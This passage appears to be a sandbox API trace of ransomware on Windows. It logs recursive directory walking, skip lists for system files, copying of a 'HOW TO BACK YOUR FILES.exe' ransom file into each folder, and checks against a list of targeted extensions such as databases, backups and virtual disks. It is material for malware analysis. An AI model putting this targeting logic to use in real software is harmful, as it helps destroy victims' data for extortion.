hHeap=0x2b0000) returned 1 [0076.588] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0076.588] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1a1e5b40, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0x4c1bf120, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c1bf120, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccda8 [0076.588] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0076.588] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0076.588] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0076.589] FindNextFileW (in: hFindFile=0x2ccda8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1a1e5b40, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0x4c1bf120, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c1bf120, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0076.589] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0076.589] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0076.589] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0076.589] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0076.589] FindNextFileW (in: hFindFile=0x2ccda8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4c1bf120, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4c1bf120, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0076.589] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0076.589] FindNextFileW (in: hFindFile=0x2ccda8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1a20bca0, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0x4c1bf120, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c1bf120, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="packages", cAlternateFileName="")) returned 1 [0076.589] lstrcmpiW (lpString1="packages", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0076.589] lstrcmpiW (lpString1="packages", lpString2="aoldtz.exe") returned 1 [0076.589] lstrcmpiW (lpString1="packages", lpString2=".") returned 1 [0076.589] lstrcmpiW (lpString1="packages", lpString2="..") returned 1 [0076.589] lstrcmpiW (lpString1="packages", lpString2="windows") returned -1 [0076.589] lstrcmpiW (lpString1="packages", lpString2="bootmgr") returned 1 [0076.589] lstrcmpiW (lpString1="packages", lpString2="temp") returned -1 [0076.589] lstrcmpiW (lpString1="packages", lpString2="pagefile.sys") returned -1 [0076.589] lstrcmpiW (lpString1="packages", lpString2="boot") returned 1 [0076.589] lstrcmpiW (lpString1="packages", lpString2="ids.txt") returned 1 [0076.589] lstrcmpiW (lpString1="packages", lpString2="ntuser.dat") returned 1 [0076.589] lstrcmpiW (lpString1="packages", lpString2="perflogs") returned -1 [0076.589] lstrcmpiW (lpString1="packages", lpString2="MSBuild") returned 1 [0076.589] lstrlenW (lpString="packages") returned 8 [0076.589] lstrlenW (lpString="C:\\Users\\All Users\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\*") returned 84 [0076.589] lstrcpyW (in: lpString1=0x2cce4a6, lpString2="packages" | out: lpString1="packages") returned="packages" [0076.589] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2d2520 [0076.589] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0xb8) returned 0x31efc8 [0076.589] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2d2528 | out: ListHead=0x2e7710, ListEntry=0x2d2528) returned 0x2d2268 [0076.589] FindNextFileW (in: hFindFile=0x2ccda8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1a20bca0, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0x4c1bf120, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c1bf120, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="packages", cAlternateFileName="")) returned 0 [0076.589] FindClose (in: hFindFile=0x2ccda8 | out: hFindFile=0x2ccda8) returned 1 [0076.590] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2d2528 [0076.590] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages") returned="C:\\Users\\All Users\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages" [0076.590] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x31efc8 | out: hHeap=0x2b0000) returned 1 [0076.590] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2520 | out: hHeap=0x2b0000) returned 1 [0076.590] lstrlenW (lpString="C:\\Users\\All Users\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages") returned 91 [0076.590] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages" | out: lpString1="C:\\Users\\All Users\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages") returned="C:\\Users\\All Users\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages" [0076.590] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0076.590] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\package cache\\{929fbd26-9020-399b-9a7a-751d61f0b942}v12.0.21005\\packages\\how to back your files.exe"), bFailIfExists=1) returned 0 [0076.591] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0076.591] GetLastError () returned 0x0 [0076.591] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0076.591] ReadFile (in: hFile=0x120, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0076.591] CloseHandle (hObject=0x120) returned 1 [0076.591] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x336fb0 | out: hHeap=0x2b0000) returned 1 [0076.591] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0076.591] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1a20bca0, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0x4c1bf120, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c1bf120, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccda8 [0076.591] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0076.591] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0076.591] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0076.591] FindNextFileW (in: hFindFile=0x2ccda8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1a20bca0, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0x4c1bf120, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c1bf120, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0076.591] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0076.591] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0076.592] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0076.592] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0076.592] FindNextFileW (in: hFindFile=0x2ccda8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4c1bf120, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4c1bf120, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0076.592] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0076.592] FindNextFileW (in: hFindFile=0x2ccda8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1a20bca0, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0x4c1e5280, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c1e5280, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="vcRuntimeAdditional_amd64", cAlternateFileName="VCRUNT~1")) returned 1 [0076.592] lstrcmpiW (lpString1="vcRuntimeAdditional_amd64", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0076.592] lstrcmpiW (lpString1="vcRuntimeAdditional_amd64", lpString2="aoldtz.exe") returned 1 [0076.592] lstrcmpiW (lpString1="vcRuntimeAdditional_amd64", lpString2=".") returned 1 [0076.592] lstrcmpiW (lpString1="vcRuntimeAdditional_amd64", lpString2="..") returned 1 [0076.592] lstrcmpiW (lpString1="vcRuntimeAdditional_amd64", lpString2="windows") returned -1 [0076.592] lstrcmpiW (lpString1="vcRuntimeAdditional_amd64", lpString2="bootmgr") returned 1 [0076.592] lstrcmpiW (lpString1="vcRuntimeAdditional_amd64", lpString2="temp") returned 1 [0076.592] lstrcmpiW (lpString1="vcRuntimeAdditional_amd64", lpString2="pagefile.sys") returned 1 [0076.592] lstrcmpiW (lpString1="vcRuntimeAdditional_amd64", lpString2="boot") returned 1 [0076.592] lstrcmpiW (lpString1="vcRuntimeAdditional_amd64", lpString2="ids.txt") returned 1 [0076.592] lstrcmpiW (lpString1="vcRuntimeAdditional_amd64", lpString2="ntuser.dat") returned 1 [0076.592] lstrcmpiW (lpString1="vcRuntimeAdditional_amd64", lpString2="perflogs") returned 1 [0076.592] lstrcmpiW (lpString1="vcRuntimeAdditional_amd64", lpString2="MSBuild") returned 1 [0076.592] lstrlenW (lpString="vcRuntimeAdditional_amd64") returned 25 [0076.592] lstrlenW (lpString="C:\\Users\\All Users\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\*") returned 93 [0076.592] lstrcpyW (in: lpString1=0x2cce4b8, lpString2="vcRuntimeAdditional_amd64" | out: lpString1="vcRuntimeAdditional_amd64") returned="vcRuntimeAdditional_amd64" [0076.592] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2d2520 [0076.592] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0xec) returned 0x2c8eb8 [0076.592] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2d2528 | out: ListHead=0x2e7710, ListEntry=0x2d2528) returned 0x2d2268 [0076.592] FindNextFileW (in: hFindFile=0x2ccda8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1a20bca0, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0x4c1e5280, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c1e5280, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="vcRuntimeAdditional_amd64", cAlternateFileName="VCRUNT~1")) returned 0 [0076.592] FindClose (in: hFindFile=0x2ccda8 | out: hFindFile=0x2ccda8) returned 1 [0076.592] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2d2528 [0076.592] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64") returned="C:\\Users\\All Users\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64" [0076.592] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2c8eb8 | out: hHeap=0x2b0000) returned 1 [0076.592] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2520 | out: hHeap=0x2b0000) returned 1 [0076.592] lstrlenW (lpString="C:\\Users\\All Users\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64") returned 117 [0076.592] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64" | out: lpString1="C:\\Users\\All Users\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64") returned="C:\\Users\\All Users\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64" [0076.592] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0076.592] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\package cache\\{929fbd26-9020-399b-9a7a-751d61f0b942}v12.0.21005\\packages\\vcruntimeadditional_amd64\\how to back your files.exe"), bFailIfExists=1) returned 0 [0076.593] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0076.593] GetLastError () returned 0x0 [0076.593] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0076.593] ReadFile (in: hFile=0x120, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0076.593] CloseHandle (hObject=0x120) returned 1 [0076.593] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x336fb0 | out: hHeap=0x2b0000) returned 1 [0076.593] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0076.593] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1a20bca0, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0x4c1e5280, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c1e5280, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccda8 [0076.594] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0076.594] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0076.594] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0076.594] FindNextFileW (in: hFindFile=0x2ccda8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1a20bca0, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0x4c1e5280, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c1e5280, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0076.594] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0076.594] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0076.594] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0076.594] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0076.594] FindNextFileW (in: hFindFile=0x2ccda8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7c9b1b00, ftCreationTime.dwHighDateTime=0x1cf3dd2, ftLastAccessTime.dwLowDateTime=0x7c9b1b00, ftLastAccessTime.dwHighDateTime=0x1cf3dd2, ftLastWriteTime.dwLowDateTime=0x7c9b1b00, ftLastWriteTime.dwHighDateTime=0x1cf3dd2, nFileSizeHigh=0x0, nFileSizeLow=0x554520, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="cab1.cab", cAlternateFileName="")) returned 1 [0076.594] lstrcmpiW (lpString1="cab1.cab", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0076.594] lstrcmpiW (lpString1="cab1.cab", lpString2="aoldtz.exe") returned 1 [0076.594] lstrcmpiW (lpString1="cab1.cab", lpString2=".") returned 1 [0076.594] lstrcmpiW (lpString1="cab1.cab", lpString2="..") returned 1 [0076.594] lstrcmpiW (lpString1="cab1.cab", lpString2="windows") returned -1 [0076.594] lstrcmpiW (lpString1="cab1.cab", lpString2="bootmgr") returned 1 [0076.594] lstrcmpiW (lpString1="cab1.cab", lpString2="temp") returned -1 [0076.594] lstrcmpiW (lpString1="cab1.cab", lpString2="pagefile.sys") returned -1 [0076.594] lstrcmpiW (lpString1="cab1.cab", lpString2="boot") returned 1 [0076.594] lstrcmpiW (lpString1="cab1.cab", lpString2="ids.txt") returned -1 [0076.594] lstrcmpiW (lpString1="cab1.cab", lpString2="ntuser.dat") returned -1 [0076.594] lstrcmpiW (lpString1="cab1.cab", lpString2="perflogs") returned -1 [0076.594] lstrcmpiW (lpString1="cab1.cab", lpString2="MSBuild") returned -1 [0076.594] lstrlenW (lpString="cab1.cab") returned 8 [0076.594] lstrlenW (lpString="C:\\Users\\All Users\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64\\*") returned 119 [0076.594] lstrcpyW (in: lpString1=0x2cce4ec, lpString2="cab1.cab" | out: lpString1="cab1.cab") returned="cab1.cab" [0076.594] lstrlenW (lpString="cab1.cab") returned 8 [0076.594] lstrlenW (lpString="Ares865") returned 7 [0076.594] lstrcmpiW (lpString1="ab1.cab", lpString2="Ares865") returned -1 [0076.594] lstrlenW (lpString=".dll") returned 4 [0076.594] lstrcmpiW (lpString1="cab1.cab", lpString2=".dll") returned 1 [0076.594] lstrlenW (lpString=".lnk") returned 4 [0076.594] lstrcmpiW (lpString1="cab1.cab", lpString2=".lnk") returned 1 [0076.594] lstrlenW (lpString=".ini") returned 4 [0076.594] lstrcmpiW (lpString1="cab1.cab", lpString2=".ini") returned 1 [0076.594] lstrlenW (lpString=".sys") returned 4 [0076.595] lstrcmpiW (lpString1="cab1.cab", lpString2=".sys") returned 1 [0076.595] lstrlenW (lpString="cab1.cab") returned 8 [0076.595] lstrlenW (lpString="bak") returned 3 [0076.595] lstrcmpiW (lpString1="cab", lpString2="bak") returned 1 [0076.595] lstrlenW (lpString="ba_") returned 3 [0076.595] lstrcmpiW (lpString1="cab", lpString2="ba_") returned 1 [0076.595] lstrlenW (lpString="dbb") returned 3 [0076.595] lstrcmpiW (lpString1="cab", lpString2="dbb") returned -1 [0076.595] lstrlenW (lpString="vmdk") returned 4 [0076.595] lstrcmpiW (lpString1=".cab", lpString2="vmdk") returned -1 [0076.595] lstrlenW (lpString="rar") returned 3 [0076.595] lstrcmpiW (lpString1="cab", lpString2="rar") returned -1 [0076.595] lstrlenW (lpString="zip") returned 3 [0076.595] lstrcmpiW (lpString1="cab", lpString2="zip") returned -1 [0076.595] lstrlenW (lpString="tgz") returned 3 [0076.595] lstrcmpiW (lpString1="cab", lpString2="tgz") returned -1 [0076.595] lstrlenW (lpString="vbox") returned 4 [0076.595] lstrcmpiW (lpString1=".cab", lpString2="vbox") returned -1 [0076.595] lstrlenW (lpString="vdi") returned 3 [0076.595] lstrcmpiW (lpString1="cab", lpString2="vdi") returned -1 [0076.595] lstrlenW (lpString="vhd") returned 3 [0076.595] lstrcmpiW (lpString1="cab", lpString2="vhd") returned -1 [0076.595] lstrlenW (lpString="vhdx") returned 4 [0076.595] lstrcmpiW (lpString1=".cab", lpString2="vhdx") returned -1 [0076.595] lstrlenW (lpString="avhd") returned 4 [0076.595] lstrcmpiW (lpString1=".cab", lpString2="avhd") returned -1 [0076.595] lstrlenW (lpString="db") returned 2 [0076.595] lstrcmpiW (lpString1="ab", lpString2="db") returned -1 [0076.595] lstrlenW (lpString="db2") returned 3 [0076.595] lstrcmpiW (lpString1="cab", lpString2="db2") returned -1 [0076.595] lstrlenW (lpString="db3") returned 3 [0076.595] lstrcmpiW (lpString1="cab", lpString2="db3") returned -1 [0076.595] lstrlenW (lpString="dbf") returned 3 [0076.595] lstrcmpiW (lpString1="cab", lpString2="dbf") returned -1 [0076.595] lstrlenW (lpString="mdf") returned 3 [0076.595] lstrcmpiW (lpString1="cab", lpString2="mdf") returned -1 [0076.595] lstrlenW (lpString="mdb") returned 3 [0076.595] lstrcmpiW (lpString1="cab", lpString2="mdb") returned -1 [0076.595] lstrlenW (lpString="sql") returned 3 [0076.596] lstrcmpiW (lpString1="cab", lpString2="sql") returned -1 [0076.596] lstrlenW (lpString="sqlite") returned 6 [0076.596] lstrcmpiW (lpString1="b1.cab", lpString2="sqlite") returned -1 [0076.596] lstrlenW (lpString="sqlite3") returned 7 [0076.596] lstrcmpiW (lpString1="ab1.cab", lpString2="sqlite3") returned -1 [0076.596] lstrlenW (lpString="sqlitedb") returned 8 [0076.596] lstrlenW (lpString="xml") returned 3 [0076.596] lstrcmpiW (lpString1="cab", lpString2="xml") returned -1 [0076.596] lstrlenW (lpString="$er") returned 3 [0076.596] lstrcmpiW (lpString1="cab", lpString2="$er") returned 1 [0076.596] lstrlenW (lpString="4dd") returned 3 [0076.596] lstrcmpiW (lpString1="cab", lpString2="4dd") returned 1 [0076.596] lstrlenW (lpString="4dl") returned 3 [0076.596] lstrcmpiW (lpString1="cab", lpString2="4dl") returned 1 [0076.596] lstrlenW (lpString="^^^") returned 3 [0076.596] lstrcmpiW (lpString1="cab", lpString2="^^^") returned 1 [0076.596] lstrlenW (lpString="abs") returned 3 [0076.596] lstrcmpiW (lpString1="cab", lpString2="abs") returned 1 [0076.596] lstrlenW (lpString="abx") returned 3 [0076.596] lstrcmpiW (lpString1="cab", lpString2="abx") returned 1 [0076.596] lstrlenW (lpString="accdb") returned 5 [0076.596] lstrcmpiW (lpString1="1.cab", lpString2="accdb") returned -1 [0076.596] lstrlenW (lpString="accdc") returned 5 [0076.596] lstrcmpiW (lpString1="1.cab", lpString2="accdc") returned -1 [0076.596] lstrlenW (lpString="accde") returned 5 [0076.596] lstrcmpiW (lpString1="1.cab", lpString2="accde") returned -1 [0076.596] lstrlenW (lpString="accdr") returned 5 [0076.596] lstrcmpiW (lpString1="1.cab", lpString2="accdr") returned -1 [0076.596] lstrlenW (lpString="accdt") returned 5 [0076.596] lstrcmpiW (lpString1="1.cab", lpString2="accdt") returned -1 [0076.596] lstrlenW (lpString="accdw") returned 5 [0076.596] lstrcmpiW (lpString1="1.cab", lpString2="accdw") returned -1 [0076.596] lstrlenW (lpString="accft") returned 5 [0076.596] lstrcmpiW (lpString1="1.cab", lpString2="accft") returned -1 [0076.596] lstrlenW (lpString="adb") returned 3 [0076.596] lstrcmpiW (lpString1="cab", lpString2="adb") returned 1 [0076.596] lstrlenW (lpString="adb") returned 3 [0076.596] lstrcmpiW (lpString1="cab", lpString2="adb") returned 1 [0076.597] lstrlenW (lpString="ade") returned 3 [0076.597] lstrcmpiW (lpString1="cab", lpString2="ade") returned 1 [0076.597] lstrlenW (lpString="adf") returned 3 [0076.597] lstrcmpiW (lpString1="cab", lpString2="adf") returned 1 [0076.597] lstrlenW (lpString="adn") returned 3 [0076.597] lstrcmpiW (lpString1="cab", lpString2="adn") returned 1 [0076.597] lstrlenW (lpString="adp") returned 3 [0076.597] lstrcmpiW (lpString1="cab", lpString2="adp") returned 1 [0076.597] lstrlenW (lpString="alf") returned 3 [0076.597] lstrcmpiW (lpString1="cab", lpString2="alf") returned 1 [0076.597] lstrlenW (lpString="ask") returned 3 [0076.597] lstrcmpiW (lpString1="cab", lpString2="ask") returned 1 [0076.597] lstrlenW (lpString="btr") returned 3 [0076.597] lstrcmpiW (lpString1="cab", lpString2="btr") returned 1 [0076.597] lstrlenW (lpString="cat") returned 3 [0076.597] lstrcmpiW (lpString1="cab", lpString2="cat") returned -1 [0076.597] lstrlenW (lpString="cdb") returned 3 [0076.597] lstrcmpiW (lpString1="cab", 